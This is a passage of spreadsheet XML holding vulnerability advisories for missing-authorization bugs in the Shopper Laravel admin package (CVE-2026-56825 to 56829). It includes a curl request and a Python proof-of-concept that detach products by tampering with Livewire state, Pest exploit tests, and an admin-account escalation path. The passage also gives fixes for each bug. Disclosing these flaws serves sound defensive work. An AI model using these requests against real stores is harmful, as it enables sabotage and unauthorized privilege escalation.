      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56825</t>
        </is>
      </c>
      <c r="D30" s="5" t="inlineStr"/>
      <c r="E30" s="5" t="inlineStr"/>
      <c r="F30" s="5" t="inlineStr"/>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr">
        <is>
          <t>composer:shopper/framework</t>
        </is>
      </c>
      <c r="M30" s="5" t="inlineStr">
        <is>
          <t>2.9.2</t>
        </is>
      </c>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr"/>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>## Title
Missing authorization on product removal actions in CollectionProducts component
## Description
A lack of authorization control was discovered on both the per-record delete action and the bulk delete action inside `packages/admin/src/Livewire/Components/Collection/CollectionProducts.php`. Neither the `Action::make('delete')` at line 73 nor the `DeleteBulkAction::make()` at line 91 carries an `-&gt;authorize(...)` chain. The component also exposes `public Collection $collection` without `#[Locked]`, so the collection ID is mutable in the Livewire wire payload. Any authenticated admin-panel session, including staff who hold only `browse_collections`, can detach individual products or bulk-detach all products from any collection in the database.
## Severity
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H  Score: 8.1  (High)
## Affected files
- `packages/admin/src/Livewire/Components/Collection/CollectionProducts.php:40,73-88,91-105`
```php
// Line 40 - client-mutable, no #[Locked]
public Collection $collection;
// Lines 73-88 - per-record delete action, no -&gt;authorize(...)
-&gt;recordActions([
    Action::make('delete')
        -&gt;label(__('shopper::forms.actions.delete'))
        -&gt;icon(Untitledui::Trash03)
        -&gt;iconButton()
        -&gt;color('danger')
        -&gt;requiresConfirmation()
        -&gt;action(function (Product $record): void {
            $this-&gt;collection-&gt;products()-&gt;detach([$record-&gt;id]);
            $this-&gt;dispatch('collection.add.product');
            Notification::make()
                -&gt;title(__('shopper::pages/collections.remove_product'))
                -&gt;success()
                -&gt;send();
        }),
])
// Lines 91-105 - bulk remove action, no -&gt;authorize(...)
-&gt;groupedBulkActions([
    DeleteBulkAction::make()
        -&gt;label(__('shopper::forms.actions.delete'))
        -&gt;icon(Untitledui::Trash03)
        -&gt;requiresConfirmation()
        -&gt;action(function (EloquentCollection $records): void {
            $this-&gt;collection-&gt;products()-&gt;detach($records-&gt;pluck('id')-&gt;toArray());
            $this-&gt;dispatch('collection.add.product');
            Notification::make()
                -&gt;title(__('shopper::pages/collections.remove_product'))
                -&gt;success()
                -&gt;send();
        })
        -&gt;deselectRecordsAfterCompletion(),
])
```
## Steps to reproduce
Prerequisites: any admin-panel account, including one whose role holds only `browse_collections` (no `edit_collections` required).
```bash
SESSION="laravel_session=&lt;your_session_value&gt;"
XSRF="X-XSRF-TOKEN: &lt;url-decoded-value-of-XSRF-TOKEN-cookie&gt;"
# Step 1: Note the collection ID you wish to empty (e.g., collection_id=5).
# Step 2: Call the bulk table action on the CollectionProducts component,
#          substituting collection ID 5 in the component state.
curl -s -X POST http://localhost/shopper/livewire/update \
  -H "Content-Type: application/json" \
  -H "X-XSRF-TOKEN: $XSRF" \
  -H "Cookie: $SESSION" \
  -H "X-Livewire: 1" \
  -d '{
    "components": [{
      "snapshot": "{\"id\":\"COLLECTION_PRODUCTS_COMPONENT_ID\",\"data\":{\"collection\":5},\"checksum\":\"...\"}",
      "updates": {},
      "calls": [{
        "path": "",
        "method": "callBulkAction",
        "params": ["delete", [1, 2, 3, 4, 5]]
      }]
    }]
  }'
# Expected: HTTP 200, all listed product IDs detached from collection 5,
#           regardless of the caller having only browse_collections.
```
## Proof of concept
```python
#!/usr/bin/env python3
"""
CollectionProducts authorization bypass PoC.
Set these environment variables before running:
  BASE_URL        e.g. http://localhost
  SESSION_COOKIE  value of the laravel_session cookie
  XSRF_TOKEN      URL-decoded value of the XSRF-TOKEN cookie
  COMPONENT_ID    Livewire component snapshot ID (from page source)
  COLLECTION_ID   integer ID of the target collection
  PRODUCT_IDS     comma-separated product IDs to detach (e.g. "1,2,3")
"""
import json
import os
import requests
base_url      = os.environ['BASE_URL']
session       = os.environ['SESSION_COOKIE']
xsrf          = os.environ['XSRF_TOKEN']
component_id  = os.environ['COMPONENT_ID']
collection_id = int(os.environ['COLLECTION_ID'])
product_ids   = [int(x) for x in os.environ['PRODUCT_IDS'].split(',')]
headers = {
    'Content-Type': 'application/json',
    'Accept': 'text/html, application/xhtml+xml',
    'X-XSRF-TOKEN': xsrf,
    'Cookie': f'laravel_session={session}',
    'X-Livewire': '1',
}
snapshot = json.dumps({
    'id': component_id,
    'data': {'collection': collection_id},
    'checksum': 'UNLOCKED_PROP_NO_CHECKSUM_NEEDED',
})
payload = {
    'components': [{
        'snapshot': snapshot,
        'updates': {},
        'calls': [{
            'path': '',
            'method': 'callBulkAction',
            'params': ['delete', product_ids],
        }]
    }]
}
r = requests.post(f'{base_url}/shopper/livewire/update', headers=headers, json=payload)
print(f'Status: {r.status_code}')
print(r.text[:500])
```
## Impact
A staff member holding only `browse_collections` can silently empty any collection by detaching all of its products. Collections drive storefront catalog grouping; removing products from a collection breaks the associated landing pages and promotions for those product groups. Because `$collection` is not locked, the attacker is not limited to the collection they navigated to: they can target any collection ID in the database, including featured promotional collections they have never viewed.
## Suggested fix
```php
// packages/admin/src/Livewire/Components/Collection/CollectionProducts.php
use Livewire\Attributes\Locked;
#[Locked]                          // prevent client-side ID substitution
public Collection $collection;
// Per-record action:
Action::make('delete')
    -&gt;authorize('edit_collections')  // add this
    -&gt;action(function (Product $record): void {
        $this-&gt;collection-&gt;products()-&gt;detach([$record-&gt;id]);
        // ...
    }),
// Bulk action:
DeleteBulkAction::make()
    -&gt;authorize('edit_collections')  // add this
    -&gt;action(function (EloquentCollection $records): void {
        $this-&gt;collection-&gt;products()-&gt;detach($records-&gt;pluck('id')-&gt;toArray());
        // ...
    })
```
## Credits
Reported by Vishal Shukla ([@shukla304](https://github.com/shukla304) / [@therawdev](https://github.com/therawdev)).</t>
        </is>
      </c>
      <c r="S30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56825</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56826</t>
        </is>
      </c>
      <c r="D31" s="5" t="inlineStr"/>
      <c r="E31" s="5" t="inlineStr"/>
      <c r="F31" s="5" t="inlineStr"/>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr">
        <is>
          <t>composer:shopper/framework</t>
        </is>
      </c>
      <c r="M31" s="5" t="inlineStr">
        <is>
          <t>2.9.2</t>
        </is>
      </c>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr"/>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>## Summary
Four Livewire components in the Settings area expose destructive Filament actions (`delete` / `edit`) that perform **no server-side authorization**. Any authenticated user who can reach the Settings pages — i.e. holding only the coarse `access_setting` permission, **without** being an admin and **without** any `delete_*`/`edit_*` permission — can delete tax zones, tax rates, shipping zones, and carrier (shipping-rate) options by invoking the component action directly over the Livewire endpoint.
These records sit on the storefront checkout path, so deleting them breaks shipping-rate calculation, removes region-scoped payment methods, and corrupts tax resolution at checkout.
This is inconsistent with the rest of the admin, where destructive actions are gated by granular permissions (e.g. `Settings/Locations/Index` uses `-&gt;authorize('delete_inventories')`, and `Order/Detail` gates mutating actions with `edit_orders`).
## Affected components
| Component | File | Unauthorized action |
|---|---|---|
| `Settings\Zones\ZoneShippingOptions` | `packages/admin/src/Livewire/Components/Settings/Zones/ZoneShippingOptions.php:47` | `delete` → `CarrierOption::query()-&gt;find($arguments['id'])-&gt;delete()` (id is client-supplied) |
| `Settings\Zones\Detail` | `packages/admin/src/Livewire/Components/Settings/Zones/Detail.php:46` | `delete` → `DeleteAction` on the bound `Zone` |
| `Settings\Taxes\Detail` | `packages/admin/src/Livewire/Components/Settings/Taxes/Detail.php:42` | `delete` → `DeleteAction` on the bound `TaxZone` |
| `Settings\Taxes\TaxRates` | `packages/admin/src/Livewire/Components/Settings/Taxes/TaxRates.php:97` | `delete` → `DeleteAction` on a `TaxRate` |
Each file contains **zero** `authorize` calls, and the actions declare neither `-&gt;authorize()` nor an enforced `-&gt;visible()` guard.
## Details
The Settings pages mount these as child Livewire components. The parent page authorizes `access_setting` (e.g. `Pages/Settings/Taxes.php:29`), but the child components do not re-check authorization, and their destructive actions carry no `-&gt;authorize()`. Because each Livewire component handles its own `/livewire/update` requests, the action executes purely on the page-level `access_setting` gate — there is no per-resource permission, and `delete_zones` / `delete_taxes` permissions are never even generated by the seeder (`packages/admin/database/seeders/PermissionsTableSeeder.php`).
`ZoneShippingOptions::deleteAction()` is the clearest case — it deletes by an id taken straight from the client action arguments with no scoping and no permission check:
```php
// packages/admin/src/Livewire/Components/Settings/Zones/ZoneShippingOptions.php
public function deleteAction(): Action
{
    return Action::make('delete')
        -&gt;requiresConfirmation()
        // ... no -&gt;authorize(), no -&gt;visible()
        -&gt;action(function (array $arguments): void {
            CarrierOption::query()-&gt;find($arguments['id'])-&gt;delete();   // client-controlled id
            // ...
        });
}
```
## Proof of Concept
Confirmed with the project's own test harness (Pest + Orchestra Testbench, SQLite) — the real Livewire/Filament code path, executed as a non-admin user holding only `access_setting`.
```php
use Livewire\Livewire;
use Shopper\Core\Models\{CarrierOption, Zone};
use Shopper\Livewire\Components\Settings\Zones\ZoneShippingOptions;
use Tests\Core\Stubs\User;
uses(Tests\Admin\TestCase::class);
it('low-priv access_setting user deletes a CarrierOption with no authorization', function (): void {
    $attacker = User::factory()-&gt;create();
    $attacker-&gt;givePermissionTo('access_setting');          // NOT admin, NO delete_* permission
    $this-&gt;actingAs($attacker, config('shopper.auth.guard'));
    $zone   = Zone::factory()-&gt;create();
    $option = CarrierOption::factory()-&gt;create(['zone_id' =&gt; $zone-&gt;id]);
    Livewire::test(ZoneShippingOptions::class, ['selectedZoneId' =&gt; $zone-&gt;id])
        -&gt;callAction('delete', arguments: ['id' =&gt; $option-&gt;id]);
    expect(CarrierOption::query()-&gt;find($option-&gt;id))-&gt;toBeNull();   // deleted -&gt; vulnerable
});
```
Result:
```
Attacker: isAdmin()=false, can('access_setting')=true, can('delete_zones')=false, can('edit_zones')=false
[BEFORE] CarrierOption count = 1  (target #1 'DHL Express' exists = YES)
[ATTACK] callAction('delete', id=1) on ZoneShippingOptions
[AFTER ] CarrierOption count = 0  (target #1 exists = NO -&gt; deleted)
PASS  3 passed (11 assertions)
  ✓ CONTROL — Order/Detail::markPaid is correctly hidden without edit_orders (harness enforces declared authz)
  ✓ a CarrierOption is deleted by the low-priv user
  ✓ a shipping Zone is deleted by the low-priv user
```
The CONTROL case rules out a false positive: the same harness correctly denies `Order/Detail::markPaid` for a user lacking `edit_orders`, proving authorization is enforced when a component declares it — these four components simply declare none.
## Impact
A low-privileged staff member (or a compromised low-privileged account) can sabotage the storefront's checkout/revenue path without any delete permission:
- **Delete a `CarrierOption`** → that shipping rate disappears from checkout for the zone.
- **Delete a `Zone`** → removes the country → carrier/payment-method/currency mapping; customers shipping to those countries lose all shipping and payment options (`CarrierRateService::getRatesForZone` / `getManualRates` read these directly).
- **Delete a `TaxZone` / `TaxRate`** → `TaxCalculator::resolveZone()` can no longer resolve the zone, corrupting tax calculation at checkout.
Net effect: integrity and availability damage to live commerce configuration, performed by a principal who was never granted that authority (least-privilege violation).
## Secondary issue found while reproducing
`Zones\Detail::deleteAction()-&gt;after()` calls `$this-&gt;reset('zone')`, but `zone` is a `#[Computed]` method (not a property), so it throws `ReflectionException` **after** the row is deleted. Worth fixing alongside the authorization gap.
## Suggested remediation
Add an authorization check to each action, and ideally a `mount()` guard on each child component, matching the pattern already used in `Settings/Locations/Index.php` and `Team/RolePermission.php`:
```php
public function deleteAction(): Action
{
    return Action::make('delete')
        -&gt;authorize('access_setting')   // or a new granular delete_zones / delete_taxes permission
        -&gt;requiresConfirmation()
        // ...
}
```
Apply to the `delete` (and `edit`) actions in all four components. Consider also generating granular `*_zones` / `*_taxes` permissions so settings access can follow least privilege, and fix the `$this-&gt;reset('zone')` call in `Zones\Detail`.</t>
        </is>
      </c>
      <c r="S31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56826</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56827</t>
        </is>
      </c>
      <c r="D32" s="5" t="inlineStr"/>
      <c r="E32" s="5" t="inlineStr"/>
      <c r="F32" s="5" t="inlineStr"/>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr">
        <is>
          <t>composer:shopper/framework</t>
        </is>
      </c>
      <c r="M32" s="5" t="inlineStr">
        <is>
          <t>2.9.2</t>
        </is>
      </c>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr"/>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>## Summary
Five Filament `groupedBulkActions` blocks across the Shopper admin Livewire pages omit the `-&gt;authorize(...)` permission gate, while their per-record sibling actions (and other Shopper Index pages such as `Pages/Settings/Currencies.php`, `Pages/Reviews/Index.php`, `Pages/Collection/Index.php`, and `Pages/Discount/Index.php`) correctly chain `-&gt;authorize(...)`. Each affected page's `mount()` only requires the read-only `browse_*` permission, so a low-privilege staff user holding only the read permission can drive the bulk endpoint via the standard Livewire `callTableBulkAction` flow and execute state-mutating operations they were never granted. The vulnerability is the same class as GHSA-f946-9qp6-vgch and GHSA-j328-xmgp-j4q3 (read-only permission gating a write action), just on a different surface (Filament 4 `groupedBulkActions` rather than top-level Livewire methods).
A staff user holding only `browse_attributes` can permanently delete every product attribute in the catalog (cascading break of every dependent product variant). A user holding only `browse_tags` can permanently delete every product tag. Users holding `browse_brands`, `browse_categories`, or `browse_suppliers` can flip the visibility (`is_enabled`) of every brand/category/supplier in bulk, sabotaging storefront catalog visibility.
CVSS 3.1: `AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H` = 8.1 High. CWE-285 (Improper Authorization) and CWE-862 (Missing Authorization). The attacker has low privilege (browse-only staff role), no user interaction, network reachable.
## Vulnerable components (paths relative to repo root)
All references are HEAD = commit `ac9a760` on `master` (the very commit that closed the previous wave of authorization-drift bugs from GHSA-j328-xmgp-j4q3).
### 1) `packages/admin/src/Livewire/Pages/Attribute/Browse.php`
Mount at line 36–39 requires only `browse_attributes`.
- Lines 106–122: `DeleteBulkAction::make()` has NO `-&gt;authorize(...)` chain (the surrounding per-record `delete` action at lines 95–104 correctly does `-&gt;authorize('delete_attributes')`).
- Lines 123–138: `BulkAction::make('enabled')` has NO `-&gt;authorize(...)`.
- Lines 139–155: `BulkAction::make('disabled')` has NO `-&gt;authorize(...)`.
Net effect: a `browse_attributes`-only user can **delete every row in the attributes table**, and toggle `is_enabled` on every attribute in one request. Deleting an attribute cascades into every product variant that references it via the `attribute_product` pivot.
### 2) `packages/admin/src/Livewire/Pages/Tag/Index.php`
Mount at line 39 requires only `browse_tags`.
- Lines 96–108: `DeleteBulkAction::make()` has NO `-&gt;authorize(...)` chain (the per-record `delete` action at lines 79–94 correctly does `-&gt;authorize('delete_tags')`).
Net effect: a `browse_tags`-only user can delete every `ProductTag` row.
### 3) `packages/admin/src/Livewire/Pages/Brand/Index.php`
Mount at line 37–40 requires only `browse_brands`.
- Lines 97–112: `BulkAction::make('enabled')` has NO `-&gt;authorize(...)`.
- Lines 113–129: `BulkAction::make('disabled')` has NO `-&gt;authorize(...)`.
Net effect: a `browse_brands`-only user can flip `is_enabled` on every brand. Disabling all brands removes them from the storefront catalog. The per-record edit/delete actions and the `DeleteBulkAction` at lines 130–148 are correctly `-&gt;authorize(...)` gated — only the visibility bulk actions were missed.
### 4) `packages/admin/src/Livewire/Pages/Category/Index.php`
Mount at line 38–41 requires only `browse_categories`.
- Lines 102–117: `BulkAction::make('enabled')` has NO `-&gt;authorize(...)`.
- Lines 118–133: `BulkAction::make('disabled')` has NO `-&gt;authorize(...)`.
Net effect: a `browse_categories`-only user can flip `is_enabled` on every category. Same shape as Brand.
### 5) `packages/admin/src/Livewire/Pages/Supplier/Index.php`
Mount at line 38 requires only `browse_suppliers`.
- Lines 93–108: `BulkAction::make('enabled')` has NO `-&gt;authorize(...)`.
- Lines 109–125: `BulkAction::make('disabled')` has NO `-&gt;authorize(...)`.
Net effect: a `browse_suppliers`-only user can flip `is_enabled` on every supplier.
## Reference comparison: places that ARE correctly gated
For reference, here is what the same pattern looks like in files that DID get the fix:
- `packages/admin/src/Livewire/Pages/Settings/Currencies.php` lines 90–129: every `BulkAction` chains `-&gt;authorize('access_setting')`.
- `packages/admin/src/Livewire/Pages/Reviews/Index.php` lines 105–119: `DeleteBulkAction` chains `-&gt;authorize('delete_reviews')`.
- `packages/admin/src/Livewire/Pages/Collection/Index.php` lines 109–128: `DeleteBulkAction` chains `-&gt;authorize('delete_collections')`.
- `packages/admin/src/Livewire/Pages/Discount/Index.php` lines 126–145: `DeleteBulkAction` chains `-&gt;authorize('delete_discounts')`.
The convention is established and applied elsewhere — these five files just missed it.
## Proof of Concept
The attached file `tests/Admin/Livewire/Pages/Brand/AuthBypassPocTest.php` (added in this report) contains seven Pest tests, each acting as a `browse_*`-only staff user and invoking the bulk endpoint. All seven pass on master @ `ac9a760`:
```
   PASS  Tests\Admin\Livewire\Pages\Brand\AuthBypassPocTest
  ✓ it SHOPPER-2 PoC: read-only viewer can mass-DISABLE all brands via unguarded BulkAction
  ✓ it SHOPPER-2 PoC: read-only viewer can mass-ENABLE all brands via unguarded BulkAction
  ✓ it SHOPPER-2 PoC: read-only viewer can mass-DISABLE all categories via unguarded BulkAction
  ✓ it SHOPPER-2 PoC: read-only viewer can mass-DISABLE all suppliers via unguarded BulkAction
  ✓ it SHOPPER-2 PoC: read-only viewer can DELETE all attributes via unguarded DeleteBulkAction
  ✓ it SHOPPER-2 PoC: read-only viewer can mass-DISABLE all attributes via unguarded BulkAction
  ✓ it SHOPPER-2 PoC: browse_tags viewer can DELETE all product tags via unguarded DeleteBulkAction
  Tests:    7 passed (32 assertions)
```
Each test seeds three records, signs in a user holding only the corresponding `browse_*` permission, calls `Livewire::test(&lt;Page&gt;::class)-&gt;callTableBulkAction(...)`, and asserts the side effect (records flipped or deleted). For example, the attribute mass-delete test:
```php
$this-&gt;viewer = User::factory()-&gt;create();
$this-&gt;viewer-&gt;givePermissionTo('browse_attributes');
$this-&gt;actingAs($this-&gt;viewer);
Attribute::factory()-&gt;count(3)-&gt;create();
expect($this-&gt;viewer-&gt;can('delete_attributes'))-&gt;toBeFalse();
Livewire::test(AttributeBrowse::class)
    -&gt;callTableBulkAction(\Filament\Actions\DeleteBulkAction::class, Attribute::pluck('id')-&gt;toArray())
    -&gt;assertHasNoErrors();
expect(Attribute::count())-&gt;toBe(0);
```
The call uses the same `callTableBulkAction` helper Shopper's own test suite uses everywhere, which in turn drives the same Livewire `update` payload the browser would emit — so this is a faithful HTTP-level reproduction.
## Suggested fix
Add `-&gt;authorize(&lt;correct_permission&gt;)` to each of the five vulnerable groups, mirroring the pattern already used elsewhere:
```diff
 // Pages/Attribute/Browse.php
 -&gt;groupedBulkActions([
     DeleteBulkAction::make()
+        -&gt;authorize('delete_attributes')
         -&gt;label(__('shopper::forms.actions.delete'))
         -&gt;requiresConfirmation()
         -&gt;action(function (Collection $records): void { /* ... */ }),
     BulkAction::make('enabled')
+        -&gt;authorize('edit_attributes')
         -&gt;label(__('shopper::forms.actions.enable'))
         -&gt;action(function (Collection $records): void { /* ... */ }),
     BulkAction::make('disabled')
+        -&gt;authorize('edit_attributes')
         -&gt;label(__('shopper::forms.actions.disable'))
         -&gt;action(function (Collection $records): void { /* ... */ }),
 ])
```
Apply the equivalent change to `Pages/Tag/Index.php` (`delete_tags`), `Pages/Brand/Index.php` (`edit_brands` for enable/disable), `Pages/Category/Index.php` (`edit_categories`), and `Pages/Supplier/Index.php` (`edit_suppliers`).
A regression test for each file (acting as a `browse_*`-only user and expecting `assertHasErrors`/`AuthorizationException`) would lock in the fix, matching the regression tests added for #514.
## Resources
- Prior advisories of the same class (read-only permission gating a write action): GHSA-f946-9qp6-vgch, GHSA-j328-xmgp-j4q3 / GHSA-vw82-3966-f9mr.
- Same-shape fix: commit `ac9a760` (PR #514). Five Filament bulk-action groups did not receive the corresponding `-&gt;authorize(...)` chain.
- CWE-285 Improper Authorization, CWE-862 Missing Authorization.
### Credits
Reported by Vishal Shukla(@shukla304) using sechub.dev AI Agent
### Support
If this disclosure was useful and userswould like to support continued open-source security research and responsible-disclosure work, they can sponsor at https://github.com/sponsors/therawdev — Shopper is thankful for those keeping open source safe.</t>
        </is>
      </c>
      <c r="S32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56827</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56828</t>
        </is>
      </c>
      <c r="D33" s="5" t="inlineStr"/>
      <c r="E33" s="5" t="inlineStr"/>
      <c r="F33" s="5" t="inlineStr"/>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr">
        <is>
          <t>composer:shopper/framework</t>
        </is>
      </c>
      <c r="M33" s="5" t="inlineStr">
        <is>
          <t>2.9.2</t>
        </is>
      </c>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr"/>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-862</t>
        </is>
      </c>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>## Summary
Three Livewire admin components in `shopper/framework` (latest master at commit `fcd0c59`, released as v2.8.0) gate state-mutating actions on the read-only `view_users` permission. This is the same class as the issue Shopper fixed in v2.8.0 / PR #511 / [GHSA-f946-9qp6-vgch](https://github.com/shopperlabs/shopper/security/advisories/GHSA-f946-9qp6-vgch) — the PR moved most write actions from `view_users` to `access_setting`, but three were missed (one of them is a brand-new file added by the security commit itself).
A staff user holding only `view_users` + `access_dashboard` (a realistic "support" or "viewer" role per Shopper's own `PermissionsTableSeeder`) can: (1) self-escalate by granting any permission to their own role; (2) create a brand-new admin team member with a chosen password and the `admin` role and then log in as that user; (3) delete arbitrary `permissions` rows (RBAC DoS) or — when `can_be_removed=true` — delete entire roles.
CVSS 3.1: `AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` = 8.8 (High). CWE-285 (Improper Authorization) + CWE-862 (Missing Authorization).
## Vulnerable components (paths relative to repo root)
### 1) `packages/admin/src/Livewire/Components/Settings/Team/Permissions.php`
- `togglePermission(int $id)` at line 28 calls `$this-&gt;authorize('view_users');`
- `removePermission(int $id)` at line 55 calls `$this-&gt;authorize('view_users');`
The Permissions blade at `packages/admin/resources/views/livewire/components/settings/team/permissions.blade.php` line 34 emits every permission's `id` directly in `wire:click` handlers, so the attacker does not even need to guess IDs — the page itself enumerates them.
Net effect: any user who can mount the Permissions component (gated on `view_users`) can grant any permission row to the bound `$role`. Granting `access_setting` to the attacker's own role unlocks every action that PR #511 supposedly hardened with `-&gt;authorize('access_setting')`. Granting `delete_customers`, `edit_orders`, `edit_products`, `add_brands`, etc. is direct data-modification escalation.
### 2) `packages/admin/src/Livewire/SlideOvers/CreateTeamMember.php`
- `mount()` at line 53 calls `$this-&gt;authorize('view_users');`
- `store()` at line 122 calls `$this-&gt;authorize('view_users');`
This file is `new file mode 100755` in commit `fcd0c59` — it was created as part of the security fix and inherited the same misclassified gate.
`store()` creates a `User` with `email_verified_at = now()`, the attacker's chosen password, and any selected `role_id`. The `Radio::make('role_id')` options filter only excludes `config('shopper.admin.roles.user')`, so the `admin` role is selectable. Log out, log in as the new account → full admin.
### 3) `packages/admin/src/Livewire/Pages/Settings/Team/RolePermission.php`
- `deleteAction` at lines 81-90: only gated by `-&gt;visible($this-&gt;role-&gt;can_be_removed)`, with no `-&gt;authorize()` chain.
Page-level `mount` (line 52) requires only `view_users`. For any role with `can_be_removed = true`, a `view_users`-only user can call the action and delete the role (cascading the loss of permissions for every assigned user).
## Self-confirmation in the project's own test suite
The following tests are green on master @ `fcd0c59` — they ARE the PoC:
```
tests/Admin/Livewire/Components/Settings/Team/PermissionsTest.php
  line 14-16: `givePermissionTo('view_users')` only
  line 36-45: "can toggle permission to role" — passes
  line 74-85: "can remove permission" — passes
tests/Admin/Livewire/SlideOvers/CreateTeamMemberTest.php
  line 16-18: `givePermissionTo('view_users')` only
  line 29-56: "can create new team member" — passes, asserts the new user `hasRole('manager')`
```
A `view_users`-only Livewire user actor successfully toggles permissions, removes permissions, and creates a new privileged user — verified by Shopper's own regression tests.
## Suggested fix
Change `$this-&gt;authorize('view_users')` to `$this-&gt;authorize('access_setting')` in:
- `Permissions::togglePermission`
- `Permissions::removePermission`
- `Permissions::mount` (defence in depth, matches `Team\Index`)
- `CreateTeamMember::mount`
- `CreateTeamMember::store`
Add `-&gt;authorize('access_setting')` to `RolePermission::deleteAction` (matches the pattern already applied to `generatePermissionsAction`, `createPermissionAction`, and `Team\Index::DeleteAction`).
Update the two regression tests to use `access_setting` instead of `view_users` so they accurately reflect the privilege boundary.
## Resources
- Prior advisory of the same class: https://github.com/shopperlabs/shopper/security/advisories/GHSA-f946-9qp6-vgch
- Fix commit that introduced these residual gaps: https://github.com/shopperlabs/shopper/commit/fcd0c5920588702df5b874f432b1042abd77a50b
- CWE-285 Improper Authorization
- CWE-862 Missing Authorization
### Credits
Reported by Vishal Shukla(@shukla304) using sechub.dev AI Agent
### Support
If this disclosure was useful and if users would like to support continued open-source security research and responsible-disclosure work, they can sponsor at https://github.com/sponsors/therawdev — Shoppers thanks those who keeping open source safe.</t>
        </is>
      </c>
      <c r="S33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56828</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56829</t>
        </is>
      </c>
      <c r="D34" s="5" t="inlineStr"/>
      <c r="E34" s="5" t="inlineStr"/>
      <c r="F34" s="5" t="inlineStr"/>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr">
        <is>
          <t>composer:shopper/framework</t>
        </is>
      </c>
      <c r="M34" s="5" t="inlineStr">
        <is>
          <t>2.9.2</t>
        </is>
      </c>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr"/>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>## Title
Unauthorized inventory stock manipulation via unlocked variant property in VariantStock component
## Description
